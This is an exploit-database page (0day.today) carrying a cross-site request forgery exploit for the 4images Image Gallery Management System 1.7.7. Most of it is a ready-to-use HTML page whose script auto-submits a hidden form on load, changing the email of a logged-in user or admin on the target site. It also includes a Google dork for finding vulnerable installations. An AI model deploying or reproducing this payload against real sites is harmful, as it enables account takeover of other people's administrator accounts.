[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

4images - Image Gallery Management System - [CSRF] Change admin

Author
Dmar al3noOoz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16714
Category
web applications
Date add
18-08-2011
Platform
php
# Exploit Title: 4images - Image Gallery Management System - [CSRF] Change mail user or admin  

# Author: Dmar al3noOoz  

# Mail : wafee_s[at]hotmail.com 
 
# Name : 4images - Image Gallery Management System

# dork : Google Dork: "4images - Image Gallery Management System"

# Software Link : http://www.4homepages.de

# Version: 1.7.7  


##############################################  Exploit  ##############################################  

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1062" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://www.XXXXXX.com/patch/member.php">
<input type="hidden" name="user_email" value="you mail"/>
<input type="hidden" name="user_email2" value="you mail"/>
<input type="hidden" name="action" value="updateprofile"/>
</form>
</body>
</html>


###########################################################################
Greetz to : dmar hacker - dr.Dmar - dev-point - v4-team - Ra7aL - tryag.cc 

and all friend
  
########################################################################### 



#  0day.today [2024-12-25]  #